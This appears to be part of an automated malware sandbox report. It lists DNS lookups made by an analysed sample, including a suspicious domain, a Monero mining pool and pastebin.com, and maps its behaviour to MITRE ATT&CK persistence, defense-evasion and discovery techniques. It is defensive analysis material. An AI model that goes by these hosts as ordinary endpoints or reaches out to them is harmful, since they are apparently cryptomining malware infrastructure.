8.8.8.8:53

127.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

127.175.169.194.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

104.21.61.162

172.67.212.39
8.8.8.8:53

162.61.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

162.61.21.104.in-addr.arpa
8.8.8.8:53

bytecloudasa.website

dns

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

104.21.61.162

172.67.212.39
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

6.173.189.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

6.173.189.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

xmr-eu1.nanopool.org

dns

66 B
210 B
1
1

DNS Request

xmr-eu1.nanopool.org

DNS Response

51.68.143.81

212.47.253.124

51.15.65.182

135.125.238.108

51.255.34.118

51.15.58.224

51.68.190.80

51.15.193.130

163.172.154.142
8.8.8.8:53

80.190.68.51.in-addr.arpa

dns

71 B
109 B
1
1

DNS Request

80.190.68.51.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

104.20.67.143

104.20.68.143

172.67.34.170
8.8.8.8:53

143.67.20.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

143.67.20.104.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery